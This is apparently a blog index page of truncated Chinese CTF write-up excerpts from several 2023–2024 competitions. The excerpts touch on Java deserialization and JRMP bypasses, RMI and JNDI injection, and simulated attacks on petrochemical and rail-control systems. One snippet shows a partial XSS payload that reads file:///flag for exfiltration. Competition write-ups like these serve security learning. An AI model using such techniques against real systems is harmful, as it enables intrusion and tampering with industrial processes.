hgame2024 ishortu ishortu1 长度限制220，随便yso反序列化一个链都是四位数的，所以这里肯定是JRMP绕了，JRMPClient直接用yso的过长，所以手动写一个 public class Test { public static void base64encode_exp(Object obj) throws IOEx…

3rm1 tctf/0ctf wp 代码审计 有客户端（flag）和服务端 jdk8u201 (！=jdk8u121，无JEP290限制；jdk>191, 若jndi注入需要考虑高版本) 客户端 非spring javawebmvc，核心代码 try { LocateRegistry.getRegistry("rmiserver&q…

2023-鹏城杯决赛wp-day3 最终成绩 石油石化自动控制安全2 该场景是模拟天然气采集、输送和净化的生产工艺流程，主要生产设备包括采气井、测量仪表、管道、锅炉、脱硫装置、脱水装置。靶标设备为工程师站实物和生产控制系统（PAC）实物。选手对需现场控制逻辑进行篡改，实现危险操作。选手需要提交报告说明整个过程。该场景需要完成石油石化自动控制安全1后…

鹏城杯2023wp-决赛-深圳-day2 轨道交通列控场景（1000分拿满） 渗透测试 1000 描述： 该场景模拟了监测网络和生产网络为两个网络，攻击者需通过监测系统网络向列车运行控制系统网络渗透的场景。 要求选手首先攻陷联锁设备（地址：192.168.11.103），以联锁设备为跳板进一步渗透生产网区域；选手需要攻陷调度服务器，通过调度软件为列…

鹏城杯2023wp-决赛-深圳-day1 手册 大家有些选手不及时 出席的 ，第一次进入鹏城实验室 没有腕带 就报来由，还是不行 就大打 选手手册 中 留的 紧急联系电话：18529592717（李老师） 大家注意哈，明天比赛 请从 上图中的 鹏城实验室 东门进入，门卫统一在 东门 审核身份，提问来由请回复“参加鹏城杯决赛，已报备”。感谢您的配合！…

xctf-TPCTF wp 还得是xctf，现在xctf的web题都没web界面了屌 XSSBOT 想法很简单，直接读文件然后外带 <img src="xasdasdasd" onerror="document.write('<iframe src=file:///flag></ifr…

2023强网拟态线上预选赛wp 不说了放图，前12晋级，不知道怎么顺延到咱第20的 还真是，好怪哦，再看一眼！ oumisotuitennnoka 非预期做法，感谢@micgo，学弟越来越屌了 <?php highlight_file(__FILE__); $dir = '/tmp'; $htContent = <&…

鹏城杯2023wp 介绍 一年一度的在深圳鹏城实验室的暑假到秋季举办的线下比赛，去年比赛以渗透赛为主，有非常趣味的体验，今年则增加了很多工控，实车，5G的场景 这个是线上比赛Aurora的wp，最终线上比赛的成绩，【aurora】和【大家好我是超威蓝猫】都晋级了，可以领到每人1k的低保，好开心！ web-web1 H::desturct->H…

xctf-actf-wp 前言 最终成绩是21名 第一天面试去了，早上和晚上抽空看了下做出了craftcms （非预期解法,因为预期解法打不通） 第二天白天睡了一天（连续一个星期8点钟起床高强度面试，顶不住了），凌晨2点打到7点出了Ave Mujica's Masquerade，然后倒头就睡到深夜 边面试边比赛真的很难顶，好在这次题目质量非常不错！…

羊城杯2023 wp 前言 周末抽空陪学弟打了一下，深感web的无力。全程基本都是我、学长和正汰在做。。。 micgo已经润实战了，令人感慨。 但令人感到高兴的是， 这次比赛难度很适合我，太棒了，学到很多！ 最后的战况是，差一道猜谜黑盒题就ak了 ez_java 法一 法一的灵感是jackson原生反序列化 BadAttributeValueExp…